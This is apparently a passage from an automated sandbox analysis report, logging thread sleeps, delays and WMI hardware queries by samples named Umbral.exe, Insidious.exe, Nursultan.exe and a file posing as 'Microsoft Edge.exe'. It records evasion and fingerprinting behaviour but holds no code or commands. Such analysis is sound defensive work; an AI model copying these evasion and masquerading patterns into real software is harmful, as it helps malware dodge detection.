                            Source: C:\Users\user\AppData\Local\Temp\Insidious.exe TID: 7296Thread sleep time: -597773s >= -30000s
                            Source: C:\Users\user\AppData\Local\Temp\Insidious.exe TID: 7296Thread sleep time: -597652s >= -30000s
                            Source: C:\Users\user\AppData\Local\Temp\Insidious.exe TID: 7296Thread sleep time: -597546s >= -30000s
                            Source: C:\Users\user\AppData\Local\Temp\Insidious.exe TID: 7296Thread sleep time: -597437s >= -30000s
                            Source: C:\Users\user\AppData\Local\Temp\Insidious.exe TID: 7296Thread sleep time: -597325s >= -30000s
                            Source: C:\Users\user\AppData\Local\Temp\Insidious.exe TID: 7296Thread sleep time: -597218s >= -30000s
                            Source: C:\Users\user\AppData\Local\Temp\Insidious.exe TID: 7296Thread sleep time: -597104s >= -30000s
                            Source: C:\Users\user\AppData\Local\Temp\Insidious.exe TID: 7296Thread sleep time: -596988s >= -30000s
                            Source: C:\Users\user\AppData\Local\Temp\Insidious.exe TID: 7296Thread sleep time: -596861s >= -30000s
                            Source: C:\Users\user\AppData\Local\Temp\Insidious.exe TID: 7296Thread sleep time: -596734s >= -30000s
                            Source: C:\Users\user\AppData\Local\Temp\Insidious.exe TID: 7296Thread sleep time: -596624s >= -30000s
                            Source: C:\Users\user\AppData\Local\Temp\Insidious.exe TID: 7064Thread sleep time: -30000s >= -30000s
                            Source: C:\Users\user\AppData\Local\Temp\Insidious.exe TID: 6500Thread sleep time: -922337203685477s >= -30000s
                            Source: C:\Users\user\AppData\Local\Temp\Nursultan.exe TID: 764Thread sleep time: -922337203685477s >= -30000s
                            Source: C:\Users\user\AppData\Local\Temp\Microsoft Edge.exe TID: 5148Thread sleep time: -922337203685477s >= -30000s
                            Source: C:\Users\user\AppData\Local\Temp\Umbral.exe TID: 7176Thread sleep time: -25825441703193356s >= -30000s
                            Source: C:\Users\user\AppData\Local\Temp\Umbral.exe TID: 7176Thread sleep time: -599079s >= -30000s
                            Source: C:\Users\user\AppData\Local\Temp\Umbral.exe TID: 7176Thread sleep time: -598930s >= -30000s
                            Source: C:\Users\user\AppData\Local\Temp\Umbral.exe TID: 7176Thread sleep time: -598766s >= -30000s
                            Source: C:\Users\user\AppData\Local\Temp\Umbral.exe TID: 7176Thread sleep time: -598599s >= -30000s
                            Source: C:\Users\user\AppData\Local\Temp\Umbral.exe TID: 7176Thread sleep time: -598469s >= -30000s
                            Source: C:\Users\user\AppData\Local\Temp\Umbral.exe TID: 7176Thread sleep time: -598352s >= -30000s
                            Source: C:\Users\user\AppData\Local\Temp\Umbral.exe TID: 7176Thread sleep time: -598230s >= -30000s
                            Source: C:\Users\user\AppData\Local\Temp\Umbral.exe TID: 7176Thread sleep time: -598122s >= -30000s
                            Source: C:\Users\user\AppData\Local\Temp\Umbral.exe TID: 7176Thread sleep time: -597987s >= -30000s
                            Source: C:\Users\user\AppData\Local\Temp\Umbral.exe TID: 7176Thread sleep time: -597868s >= -30000s
                            Source: C:\Users\user\AppData\Local\Temp\Umbral.exe TID: 7176Thread sleep time: -597747s >= -30000s
                            Source: C:\Users\user\AppData\Local\Temp\Umbral.exe TID: 7176Thread sleep time: -597596s >= -30000s
                            Source: C:\Users\user\AppData\Local\Temp\Umbral.exe TID: 7176Thread sleep time: -597469s >= -30000s
                            Source: C:\Users\user\AppData\Local\Temp\Umbral.exe TID: 7176Thread sleep time: -597343s >= -30000s
                            Source: C:\Users\user\AppData\Local\Temp\Umbral.exe TID: 7176Thread sleep time: -597229s >= -30000s
                            Source: C:\Users\user\AppData\Local\Temp\Umbral.exe TID: 7176Thread sleep time: -597110s >= -30000s
                            Source: C:\Users\user\AppData\Local\Temp\Umbral.exe TID: 7176Thread sleep time: -596983s >= -30000s
                            Source: C:\Users\user\AppData\Local\Temp\Umbral.exe TID: 7176Thread sleep time: -596872s >= -30000s
                            Source: C:\Users\user\AppData\Local\Temp\Umbral.exe TID: 7176Thread sleep time: -596756s >= -30000s
                            Source: C:\Users\user\AppData\Local\Temp\Umbral.exe TID: 7176Thread sleep time: -596594s >= -30000s
                            Source: C:\Users\user\AppData\Local\Temp\Umbral.exe TID: 7176Thread sleep time: -596375s >= -30000s
                            Source: C:\Users\user\AppData\Local\Temp\Umbral.exe TID: 7176Thread sleep time: -596183s >= -30000s
                            Source: C:\Users\user\AppData\Local\Temp\Umbral.exe TID: 7176Thread sleep time: -596031s >= -30000s
                            Source: C:\Users\user\AppData\Local\Temp\Umbral.exe TID: 7176Thread sleep time: -595874s >= -30000s
                            Source: C:\Users\user\AppData\Local\Temp\Umbral.exe TID: 7176Thread sleep time: -595605s >= -30000s
                            Source: C:\Users\user\AppData\Local\Temp\Umbral.exe TID: 7176Thread sleep time: -595447s >= -30000s
                            Source: C:\Users\user\AppData\Local\Temp\Umbral.exe TID: 7176Thread sleep time: -595226s >= -30000s
                            Source: C:\Users\user\AppData\Local\Temp\Umbral.exe TID: 7176Thread sleep time: -595100s >= -30000s
                            Source: C:\Users\user\AppData\Local\Temp\Umbral.exe TID: 7176Thread sleep time: -594958s >= -30000s
                            Source: C:\Users\user\AppData\Local\Temp\Umbral.exe TID: 7176Thread sleep time: -594782s >= -30000s
                            Source: C:\Users\user\AppData\Local\Temp\Umbral.exe TID: 7176Thread sleep time: -594641s >= -30000s
                            Source: C:\Users\user\AppData\Local\Temp\Umbral.exe TID: 7176Thread sleep time: -594487s >= -30000s
                            Source: C:\Users\user\AppData\Local\Temp\Umbral.exe TID: 7176Thread sleep time: -594358s >= -30000s
                            Source: C:\Users\user\AppData\Local\Temp\Umbral.exe TID: 7176Thread sleep time: -594232s >= -30000s
                            Source: C:\Users\user\AppData\Local\Temp\Umbral.exe TID: 7176Thread sleep time: -594094s >= -30000s
                            Source: C:\Users\user\AppData\Local\Temp\Umbral.exe TID: 7176Thread sleep time: -593981s >= -30000s
                            Source: C:\Users\user\AppData\Local\Temp\Umbral.exe TID: 7176Thread sleep time: -593869s >= -30000s
                            Source: C:\Users\user\AppData\Local\Temp\Umbral.exe TID: 7176Thread sleep time: -593765s >= -30000s
                            Source: C:\Users\user\AppData\Local\Temp\Umbral.exe TID: 7176Thread sleep time: -593648s >= -30000s
                            Source: C:\Users\user\AppData\Local\Temp\Umbral.exe TID: 7176Thread sleep time: -593527s >= -30000s
                            Source: C:\Users\user\AppData\Local\Temp\Umbral.exe TID: 7176Thread sleep time: -593375s >= -30000s
                            Source: C:\Users\user\AppData\Local\Temp\Umbral.exe TID: 7176Thread sleep time: -593227s >= -30000s
                            Source: C:\Users\user\AppData\Local\Temp\Umbral.exe TID: 7176Thread sleep time: -593090s >= -30000s
                            Source: C:\Users\user\AppData\Local\Temp\Umbral.exe TID: 7176Thread sleep time: -592891s >= -30000s
                            Source: C:\Users\user\AppData\Local\Temp\Umbral.exe TID: 7176Thread sleep time: -592735s >= -30000s
                            Source: C:\Users\user\AppData\Local\Temp\Umbral.exe TID: 7176Thread sleep time: -592532s >= -30000s
                            Source: C:\Users\user\AppData\Local\Temp\Umbral.exe TID: 7176Thread sleep time: -592360s >= -30000s
                            Source: C:\Users\user\AppData\Local\Temp\Umbral.exe TID: 7176Thread sleep time: -592204s >= -30000s
                            Source: C:\Users\user\AppData\Local\Temp\Umbral.exe TID: 7176Thread sleep time: -592047s >= -30000s
                            Source: C:\Users\user\AppData\Local\Temp\Umbral.exe TID: 7176Thread sleep time: -591907s >= -30000s
                            Source: C:\Users\user\AppData\Local\Temp\Umbral.exe TID: 7176Thread sleep time: -591750s >= -30000s
                            Source: C:\Users\user\AppData\Local\Temp\Umbral.exe TID: 7176Thread sleep time: -591621s >= -30000s
                            Source: C:\Users\user\AppData\Local\Temp\Umbral.exe TID: 7176Thread sleep time: -591475s >= -30000s
                            Source: C:\Users\user\AppData\Local\Temp\Umbral.exe TID: 7176Thread sleep time: -591356s >= -30000s
                            Source: C:\Users\user\AppData\Local\Temp\Umbral.exe TID: 7176Thread sleep time: -591125s >= -30000s
                            Source: C:\Users\user\AppData\Local\Temp\Umbral.exe TID: 7176Thread sleep time: -590903s >= -30000s
                            Source: C:\Users\user\AppData\Local\Temp\Umbral.exe TID: 7176Thread sleep time: -590795s >= -30000s
                            Source: C:\Users\user\AppData\Local\Temp\Umbral.exe TID: 7176Thread sleep time: -590688s >= -30000s
                            Source: C:\Users\user\AppData\Local\Temp\Umbral.exe TID: 7176Thread sleep time: -590563s >= -30000s
                            Source: C:\Users\user\AppData\Local\Temp\Umbral.exe TID: 7176Thread sleep time: -590449s >= -30000s
                            Source: C:\Users\user\AppData\Local\Temp\Umbral.exe TID: 7176Thread sleep time: -590325s >= -30000s
                            Source: C:\Users\user\AppData\Local\Temp\Umbral.exe TID: 7176Thread sleep time: -590188s >= -30000s
                            Source: C:\Users\user\AppData\Local\Temp\Umbral.exe TID: 7176Thread sleep time: -589985s >= -30000s
                            Source: C:\Users\user\AppData\Local\Temp\Umbral.exe TID: 7176Thread sleep time: -589860s >= -30000s
                            Source: C:\Users\user\AppData\Local\Temp\Umbral.exe TID: 7176Thread sleep time: -589735s >= -30000s
                            Source: C:\Users\user\AppData\Local\Temp\Umbral.exe TID: 7176Thread sleep time: -589610s >= -30000s
                            Source: C:\Users\user\AppData\Local\Temp\Umbral.exe TID: 7176Thread sleep time: -589469s >= -30000s
                            Source: C:\Users\user\AppData\Local\Temp\Umbral.exe TID: 7176Thread sleep time: -589340s >= -30000s
                            Source: C:\Users\user\AppData\Local\Temp\Umbral.exe TID: 7176Thread sleep time: -589232s >= -30000s
                            Source: C:\Users\user\AppData\Local\Temp\Umbral.exe TID: 7176Thread sleep time: -589125s >= -30000s
                            Source: C:\Users\user\AppData\Local\Temp\Umbral.exe TID: 7176Thread sleep time: -589007s >= -30000s
                            Source: C:\Users\user\AppData\Local\Temp\Umbral.exe TID: 7176Thread sleep time: -588891s >= -30000s
                            Source: C:\Users\user\AppData\Local\Temp\Umbral.exe TID: 7176Thread sleep time: -588766s >= -30000s
                            Source: C:\Users\user\AppData\Local\Temp\Umbral.exe TID: 7176Thread sleep time: -588641s >= -30000s
                            Source: C:\Users\user\AppData\Local\Temp\Umbral.exe TID: 7176Thread sleep time: -588492s >= -30000s
                            Source: C:\Users\user\AppData\Local\Temp\Umbral.exe TID: 7176Thread sleep time: -588391s >= -30000s
                            Source: C:\Users\user\AppData\Local\Temp\Umbral.exe TID: 7176Thread sleep time: -588266s >= -30000s
                            Source: C:\Users\user\AppData\Local\Temp\Umbral.exe TID: 7176Thread sleep time: -588147s >= -30000s
                            Source: C:\Users\user\AppData\Local\Temp\Umbral.exe TID: 7176Thread sleep time: -587969s >= -30000s
                            Source: C:\Users\user\AppData\Local\Temp\Umbral.exe TID: 7176Thread sleep time: -587735s >= -30000s
                            Source: C:\Users\user\AppData\Local\Temp\Umbral.exe TID: 7176Thread sleep time: -587532s >= -30000s
                            Source: C:\Users\user\AppData\Local\Temp\Umbral.exe TID: 7176Thread sleep time: -587396s >= -30000s
                            Source: C:\Users\user\AppData\Local\Temp\Umbral.exe TID: 7176Thread sleep time: -587261s >= -30000s
                            Source: C:\Users\user\AppData\Local\Temp\Umbral.exe TID: 7176Thread sleep time: -587151s >= -30000s
                            Source: C:\Users\user\AppData\Local\Temp\Umbral.exe TID: 7176Thread sleep time: -587044s >= -30000s
                            Source: C:\Users\user\AppData\Local\Temp\Umbral.exe TID: 7176Thread sleep time: -586912s >= -30000s
                            Source: C:\Users\user\AppData\Local\Temp\Umbral.exe TID: 7176Thread sleep time: -586782s >= -30000s
                            Source: C:\Users\user\AppData\Local\Temp\Umbral.exe TID: 7176Thread sleep time: -586645s >= -30000s
                            Source: C:\Users\user\AppData\Local\Temp\Umbral.exe TID: 7176Thread sleep time: -586527s >= -30000s
                            Source: C:\Users\user\AppData\Local\Temp\Umbral.exe TID: 7176Thread sleep time: -586422s >= -30000s
                            Source: C:\Users\user\AppData\Local\Temp\Umbral.exe TID: 7176Thread sleep time: -586309s >= -30000s
                            Source: C:\Users\user\AppData\Local\Temp\Nursultan2.exe TID: 7492Thread sleep time: -922337203685477s >= -30000s
                            Source: C:\Users\user\AppData\Local\Temp\Microsoft Edge.exe TID: 7468Thread sleep time: -922337203685477s >= -30000s
                            Source: C:\Users\user\AppData\Local\Temp\Umbral.exe TID: 7552Thread sleep time: -922337203685477s >= -30000s
                            Source: C:\Users\user\AppData\Local\Temp\Nursultan.exe TID: 7576Thread sleep time: -922337203685477s >= -30000s
                            Source: C:\Users\user\AppData\Local\Temp\Insidious.exe TID: 7860Thread sleep time: -922337203685477s >= -30000s
                            Source: C:\Users\user\AppData\Local\Temp\Microsoft Edge.exe TID: 7908Thread sleep time: -922337203685477s >= -30000s
                            Source: C:\Users\user\AppData\Local\Temp\Umbral.exe TID: 7956Thread sleep time: -922337203685477s >= -30000s
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 8184Thread sleep count: 6566 > 30
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 5760Thread sleep time: -2767011611056431s >= -30000s
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 8184Thread sleep count: 596 > 30
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 2284Thread sleep time: -922337203685477s >= -30000s
                            Source: C:\Users\user\AppData\Local\Temp\Nursultan2.exe TID: 8100Thread sleep time: -922337203685477s >= -30000s
                            Source: C:\Users\user\AppData\Local\Temp\Nursultan.exe TID: 8140Thread sleep time: -922337203685477s >= -30000s
                            Source: C:\Users\user\AppData\Local\Temp\Insidious.exe TID: 7660Thread sleep time: -922337203685477s >= -30000s
                            Source: C:\Users\user\AppData\Local\Temp\Microsoft Edge.exe TID: 7616Thread sleep time: -922337203685477s >= -30000s
                            Source: C:\Users\user\AppData\Local\Temp\Nursultan2.exe TID: 7316Thread sleep time: -922337203685477s >= -30000s
                            Source: C:\Users\user\AppData\Local\Temp\Nursultan.exe TID: 7512Thread sleep time: -922337203685477s >= -30000s
                            Source: C:\Users\user\AppData\Local\Temp\Umbral.exe TID: 7504Thread sleep time: -922337203685477s >= -30000s
                            Source: C:\Users\user\AppData\Local\Temp\Microsoft Edge.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select * from Win32_ComputerSystem
                            Source: C:\Users\user\AppData\Local\Temp\Nursultan.exeWMI Queries: IWbemServices::ExecQuery - ROOT\CIMV2 : SELECT TotalPhysicalMemory FROM Win32_ComputerSystem
                            Source: C:\Users\user\AppData\Local\Temp\Insidious.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select * From Win32_ComputerSystem
                            Source: C:\Users\user\AppData\Local\Temp\Microsoft Edge.exeWMI Queries: IWbemServices::ExecQuery - ROOT\CIMV2 : SELECT UUID FROM Win32_ComputerSystemProduct
                            Source: C:\Windows\System32\wbem\WMIC.exeWMI Queries: IWbemServices::ExecQuery - ROOT\CIMV2 : SELECT UUID FROM Win32_ComputerSystemProduct
                            Source: C:\Windows\System32\timeout.exeWMI Queries: IWbemServices::ExecQuery - ROOT\CIMV2 : SELECT UUID FROM Win32_ComputerSystemProduct
                            Source: C:\Users\user\AppData\Local\Temp\Insidious.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT ProcessorId FROM Win32_Processor
                            Source: C:\Users\user\AppData\Local\Temp\Insidious.exeWMI Queries: IWbemServices::ExecQuery - root\CIMV2 : SELECT * FROM Win32_Processor
                            Source: C:\Windows\System32\conhost.exeLast function: Thread delayed
                            Source: C:\Windows\System32\conhost.exeLast function: Thread delayed
                            Source: C:\Users\user\AppData\Local\Temp\Microsoft Edge.exeFile Volume queried: C:\ FullSizeInformationJump to behavior
                            Source: C:\Users\user\AppData\Local\Temp\Microsoft Edge.exeFile Volume queried: C:\ FullSizeInformationJump to behavior
                            Source: C:\Users\user\AppData\Local\Temp\Microsoft Edge.exeFile Volume queried: C:\ FullSizeInformationJump to behavior
                            Source: C:\Users\user\AppData\Local\Temp\Microsoft Edge.exeFile Volume queried: C:\ FullSizeInformationJump to behavior
                            Source: C:\Users\user\AppData\Local\Temp\Microsoft Edge.exeFile Volume queried: C:\ FullSizeInformationJump to behavior
                            Source: C:\Users\user\AppData\Local\Temp\Microsoft Edge.exeFile Volume queried: C:\ FullSizeInformationJump to behavior
                            Source: C:\Users\user\AppData\Local\Temp\Microsoft Edge.exeFile Volume queried: C:\ FullSizeInformationJump to behavior
                            Source: C:\Users\user\AppData\Local\Temp\Microsoft Edge.exeFile Volume queried: C:\ FullSizeInformationJump to behavior
                            Source: C:\Users\user\AppData\Local\Temp\Microsoft Edge.exeFile Volume queried: C:\ FullSizeInformationJump to behavior
                            Source: C:\Users\user\AppData\Local\Temp\Microsoft Edge.exeFile Volume queried: C:\ FullSizeInformationJump to behavior
                            Source: C:\Users\user\AppData\Local\Temp\Microsoft Edge.exeFile Volume queried: C:\ FullSizeInformationJump to behavior
                            Source: C:\Users\user\AppData\Local\Temp\Microsoft Edge.exeFile Volume queried: C:\ FullSizeInformationJump to behavior
                            Source: C:\Users\user\AppData\Local\Temp\Microsoft Edge.exeFile Volume queried: C:\ FullSizeInformationJump to behavior
                            Source: C:\Users\user\AppData\Local\Temp\Microsoft Edge.exeFile Volume queried: C:\ FullSizeInformationJump to behavior
                            Source: C:\Users\user\AppData\Local\Temp\Microsoft Edge.exeFile Volume queried: C:\ FullSizeInformation
                            Source: C:\Users\user\AppData\Local\Temp\Microsoft Edge.exeFile Volume queried: C:\ FullSizeInformation
                            Source: C:\Users\user\AppData\Local\Temp\Microsoft Edge.exeFile Volume queried: C:\ FullSizeInformation
                            Source: C:\Users\user\AppData\Local\Temp\Microsoft Edge.exeFile Volume queried: C:\ FullSizeInformation
                            Source: C:\Users\user\Desktop\Nursultan.exeThread delayed: delay time: 922337203685477Jump to behavior
                            Source: C:\Users\user\AppData\Local\Temp\Nursultan.exeThread delayed: delay time: 922337203685477Jump to behavior
                            Source: C:\Users\user\AppData\Local\Temp\Microsoft Edge.exeThread delayed: delay time: 922337203685477Jump to behavior
                            Source: C:\Users\user\AppData\Local\Temp\Nursultan2.exeThread delayed: delay time: 922337203685477Jump to behavior
                            Source: C:\Users\user\AppData\Local\Temp\Nursultan.exeThread delayed: delay time: 922337203685477Jump to behavior
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477
                            Source: C:\Users\user\AppData\Local\Temp\Nursultan2.exeThread delayed: delay time: 922337203685477
                            Source: C:\Users\user\AppData\Local\Temp\Insidious.exeThread delayed: delay time: 922337203685477
                            Source: C:\Users\user\AppData\Local\Temp\Insidious.exeThread delayed: delay time: 600000
                            Source: C:\Users\user\AppData\Local\Temp\Insidious.exeThread delayed: delay time: 599874
                            Source: C:\Users\user\AppData\Local\Temp\Insidious.exeThread delayed: delay time: 599765
                            Source: C:\Users\user\AppData\Local\Temp\Insidious.exeThread delayed: delay time: 599619
                            Source: C:\Users\user\AppData\Local\Temp\Insidious.exeThread delayed: delay time: 599501
                            Source: C:\Users\user\AppData\Local\Temp\Insidious.exeThread delayed: delay time: 599377
                            Source: C:\Users\user\AppData\Local\Temp\Insidious.exeThread delayed: delay time: 599075
                            Source: C:\Users\user\AppData\Local\Temp\Insidious.exeThread delayed: delay time: 598937
                            Source: C:\Users\user\AppData\Local\Temp\Insidious.exeThread delayed: delay time: 598703
                            Source: C:\Users\user\AppData\Local\Temp\Insidious.exeThread delayed: delay time: 598453
                            Source: C:\Users\user\AppData\Local\Temp\Insidious.exeThread delayed: delay time: 598150
                            Source: C:\Users\user\AppData\Local\Temp\Insidious.exeThread delayed: delay time: 598030
                            Source: C:\Users\user\AppData\Local\Temp\Insidious.exeThread delayed: delay time: 597918
                            Source: C:\Users\user\AppData\Local\Temp\Insidious.exeThread delayed: delay time: 597773
                            Source: C:\Users\user\AppData\Local\Temp\Insidious.exeThread delayed: delay time: 597652
                            Source: C:\Users\user\AppData\Local\Temp\Insidious.exeThread delayed: delay time: 597546
                            Source: C:\Users\user\AppData\Local\Temp\Insidious.exeThread delayed: delay time: 597437
                            Source: C:\Users\user\AppData\Local\Temp\Insidious.exeThread delayed: delay time: 597325
                            Source: C:\Users\user\AppData\Local\Temp\Insidious.exeThread delayed: delay time: 597218
                            Source: C:\Users\user\AppData\Local\Temp\Insidious.exeThread delayed: delay time: 597104
                            Source: C:\Users\user\AppData\Local\Temp\Insidious.exeThread delayed: delay time: 596988
                            Source: C:\Users\user\AppData\Local\Temp\Insidious.exeThread delayed: delay time: 596861
                            Source: C:\Users\user\AppData\Local\Temp\Insidious.exeThread delayed: delay time: 596734
                            Source: C:\Users\user\AppData\Local\Temp\Insidious.exeThread delayed: delay time: 596624
                            Source: C:\Users\user\AppData\Local\Temp\Insidious.exeThread delayed: delay time: 922337203685477
                            Source: C:\Users\user\AppData\Local\Temp\Nursultan.exeThread delayed: delay time: 922337203685477
                            Source: C:\Users\user\AppData\Local\Temp\Microsoft Edge.exeThread delayed: delay time: 922337203685477
                            Source: C:\Users\user\AppData\Local\Temp\Umbral.exeThread delayed: delay time: 922337203685477
                            Source: C:\Users\user\AppData\Local\Temp\Umbral.exeThread delayed: delay time: 599079
                            Source: C:\Users\user\AppData\Local\Temp\Umbral.exeThread delayed: delay time: 598930
                            Source: C:\Users\user\AppData\Local\Temp\Umbral.exeThread delayed: delay time: 598766
                            Source: C:\Users\user\AppData\Local\Temp\Umbral.exeThread delayed: delay time: 598599
                            Source: C:\Users\user\AppData\Local\Temp\Umbral.exeThread delayed: delay time: 598469
                            Source: C:\Users\user\AppData\Local\Temp\Umbral.exeThread delayed: delay time: 598352
                            Source: C:\Users\user\AppData\Local\Temp\Umbral.exeThread delayed: delay time: 598230
                            Source: C:\Users\user\AppData\Local\Temp\Umbral.exeThread delayed: delay time: 598122
                            Source: C:\Users\user\AppData\Local\Temp\Umbral.exeThread delayed: delay time: 597987
                            Source: C:\Users\user\AppData\Local\Temp\Umbral.exeThread delayed: delay time: 597868
                            Source: C:\Users\user\AppData\Local\Temp\Umbral.exeThread delayed: delay time: 597747
                            Source: C:\Users\user\AppData\Local\Temp\Umbral.exeThread delayed: delay time: 597596
                            Source: C:\Users\user\AppData\Local\Temp\Umbral.exeThread delayed: delay time: 597469
                            Source: C:\Users\user\AppData\Local\Temp\Umbral.exeThread delayed: delay time: 597343
                            Source: C:\Users\user\AppData\Local\Temp\Umbral.exeThread delayed: delay time: 597229
                            Source: C:\Users\user\AppData\Local\Temp\Umbral.exeThread delayed: delay time: 597110
                            Source: C:\Users\user\AppData\Local\Temp\Umbral.exeThread delayed: delay time: 596983
                            Source: C:\Users\user\AppData\Local\Temp\Umbral.exeThread delayed: delay time: 596872
                            Source: C:\Users\user\AppData\Local\Temp\Umbral.exeThread delayed: delay time: 596756
                            Source: C:\Users\user\AppData\Local\Temp\Umbral.exeThread delayed: delay time: 596594
                            Source: C:\Users\user\AppData\Local\Temp\Umbral.exeThread delayed: delay time: 596375
                            Source: C:\Users\user\AppData\Local\Temp\Umbral.exeThread delayed: delay time: 596183
                            Source: C:\Users\user\AppData\Local\Temp\Umbral.exeThread delayed: delay time: 596031
                            Source: C:\Users\user\AppData\Local\Temp\Umbral.exeThread delayed: delay time: 595874
                            Source: C:\Users\user\AppData\Local\Temp\Umbral.exeThread delayed: delay time: 595605
                            Source: C:\Users\user\AppData\Local\Temp\Umbral.exeThread delayed: delay time: 595447
                            Source: C:\Users\user\AppData\Local\Temp\Umbral.exeThread delayed: delay time: 595226
                            Source: C:\Users\user\AppData\Local\Temp\Umbral.exeThread delayed: delay time: 595100
                            Source: C:\Users\user\AppData\Local\Temp\Umbral.exeThread delayed: delay time: 594958
                            Source: C:\Users\user\AppData\Local\Temp\Umbral.exeThread delayed: delay time: 594782
                            Source: C:\Users\user\AppData\Local\Temp\Umbral.exeThread delayed: delay time: 594641
                            Source: C:\Users\user\AppData\Local\Temp\Umbral.exeThread delayed: delay time: 594487
                            Source: C:\Users\user\AppData\Local\Temp\Umbral.exeThread delayed: delay time: 594358
                            Source: C:\Users\user\AppData\Local\Temp\Umbral.exeThread delayed: delay time: 594232
                            Source: C:\Users\user\AppData\Local\Temp\Umbral.exeThread delayed: delay time: 594094
                            Source: C:\Users\user\AppData\Local\Temp\Umbral.exeThread delayed: delay time: 593981
                            Source: C:\Users\user\AppData\Local\Temp\Umbral.exeThread delayed: delay time: 593869
                            Source: C:\Users\user\AppData\Local\Temp\Umbral.exeThread delayed: delay time: 593765
                            Source: C:\Users\user\AppData\Local\Temp\Umbral.exeThread delayed: delay time: 593648
                            Source: C:\Users\user\AppData\Local\Temp\Umbral.exeThread delayed: delay time: 593527
                            Source: C:\Users\user\AppData\Local\Temp\Umbral.exeThread delayed: delay time: 593375
                            Source: C:\Users\user\AppData\Local\Temp\Umbral.exeThread delayed: delay time: 593227
                            Source: C:\Users\user\AppData\Local\Temp\Umbral.exeThread delayed: delay time: 593090
                            Source: C:\Users\user\AppData\Local\Temp\Umbral.exeThread delayed: delay time: 592891
                            Source: C:\Users\user\AppData\Local\Temp\Umbral.exeThread delayed: delay time: 592735
                            Source: C:\Users\user\AppData\Local\Temp\Umbral.exeThread delayed: delay time: 592532
                            Source: C:\Users\user\AppData\Local\Temp\Umbral.exeThread delayed: delay time: 592360
                            Source: C:\Users\user\AppData\Local\Temp\Umbral.exeThread delayed: delay time: 592204
                            Source: C:\Users\user\AppData\Local\Temp\Umbral.exeThread delayed: delay time: 592047
                            Source: C:\Users\user\AppData\Local\Temp\Umbral.exeThread delayed: delay time: 591907
                            Source: C:\Users\user\AppData\Local\Temp\Umbral.exeThread delayed: delay time: 591750
                            Source: C:\Users\user\AppData\Local\Temp\Umbral.exeThread delayed: delay time: 591621
                            Source: C:\Users\user\AppData\Local\Temp\Umbral.exeThread delayed: delay time: 591475
                            Source: C:\Users\user\AppData\Local\Temp\Umbral.exeThread delayed: delay time: 591356
                            Source: C:\Users\user\AppData\Local\Temp\Umbral.exeThread delayed: delay time: 591125
                            Source: C:\Users\user\AppData\Local\Temp\Umbral.exeThread delayed: delay time: 590903
                            Source: C:\Users\user\AppData\Local\Temp\Umbral.exeThread delayed: delay time: 590795
                            Source: C:\Users\user\AppData\Local\Temp\Umbral.exeThread delayed: delay time: 590688
                            Source: C:\Users\user\AppData\Local\Temp\Umbral.exeThread delayed: delay time: 590563
                            Source: C:\Users\user\AppData\Local\Temp\Umbral.exeThread delayed: delay time: 590449
                            Source: C:\Users\user\AppData\Local\Temp\Umbral.exeThread delayed: delay time: 590325
                            Source: C:\Users\user\AppData\Local\Temp\Umbral.exeThread delayed: delay time: 590188
                            Source: C:\Users\user\AppData\Local\Temp\Umbral.exeThread delayed: delay time: 589985
                            Source: C:\Users\user\AppData\Local\Temp\Umbral.exeThread delayed: delay time: 589860
                            Source: C:\Users\user\AppData\Local\Temp\Umbral.exeThread delayed: delay time: 589735
                            Source: C:\Users\user\AppData\Local\Temp\Umbral.exeThread delayed: delay time: 589610
                            Source: C:\Users\user\AppData\Local\Temp\Umbral.exeThread delayed: delay time: 589469
                            Source: C:\Users\user\AppData\Local\Temp\Umbral.exeThread delayed: delay time: 589340
                            Source: C:\Users\user\AppData\Local\Temp\Umbral.exeThread delayed: delay time: 589232
                            Source: C:\Users\user\AppData\Local\Temp\Umbral.exeThread delayed: delay time: 589125
                            Source: C:\Users\user\AppData\Local\Temp\Umbral.exeThread delayed: delay time: 589007
                            Source: C:\Users\user\AppData\Local\Temp\Umbral.exeThread delayed: delay time: 588891
                            Source: C:\Users\user\AppData\Local\Temp\Umbral.exeThread delayed: delay time: 588766
                            Source: C:\Users\user\AppData\Local\Temp\Umbral.exeThread delayed: delay time: 588641
                            Source: C:\Users\user\AppData\Local\Temp\Umbral.exeThread delayed: delay time: 588492
                            Source: C:\Users\user\AppData\Local\Temp\Umbral.exeThread delayed: delay time: 588391
                            Source: C:\Users\user\AppData\Local\Temp\Umbral.exeThread delayed: delay time: 588266
                            Source: C:\Users\user\AppData\Local\Temp\Umbral.exeThread delayed: delay time: 588147
                            Source: C:\Users\user\AppData\Local\Temp\Umbral.exeThread delayed: delay time: 587969
                            Source: C:\Users\user\AppData\Local\Temp\Umbral.exeThread delayed: delay time: 587735
                            Source: C:\Users\user\AppData\Local\Temp\Umbral.exeThread delayed: delay time: 587532
                            Source: C:\Users\user\AppData\Local\Temp\Umbral.exeThread delayed: delay time: 587396
                            Source: C:\Users\user\AppData\Local\Temp\Umbral.exeThread delayed: delay time: 587261
                            Source: C:\Users\user\AppData\Local\Temp\Umbral.exeThread delayed: delay time: 587151
                            Source: C:\Users\user\AppData\Local\Temp\Umbral.exeThread delayed: delay time: 587044
                            Source: C:\Users\user\AppData\Local\Temp\Umbral.exeThread delayed: delay time: 586912
                            Source: C:\Users\user\AppData\Local\Temp\Umbral.exeThread delayed: delay time: 586782
                            Source: C:\Users\user\AppData\Local\Temp\Umbral.exeThread delayed: delay time: 586645
                            Source: C:\Users\user\AppData\Local\Temp\Umbral.exeThread delayed: delay time: 586527
                            Source: C:\Users\user\AppData\Local\Temp\Umbral.exeThread delayed: delay time: 586422
                            Source: C:\Users\user\AppData\Local\Temp\Umbral.exeThread delayed: delay time: 586309
                            Source: C:\Users\user\AppData\Local\Temp\Nursultan2.exeThread delayed: delay time: 922337203685477
                            Source: C:\Users\user\AppData\Local\Temp\Microsoft Edge.exeThread delayed: delay time: 922337203685477
                            Source: C:\Users\user\AppData\Local\Temp\Umbral.exeThread delayed: delay time: 922337203685477
                            Source: C:\Users\user\AppData\Local\Temp\Nursultan.exeThread delayed: delay time: 922337203685477
                            Source: C:\Users\user\AppData\Local\Temp\Insidious.exeThread delayed: delay time: 922337203685477
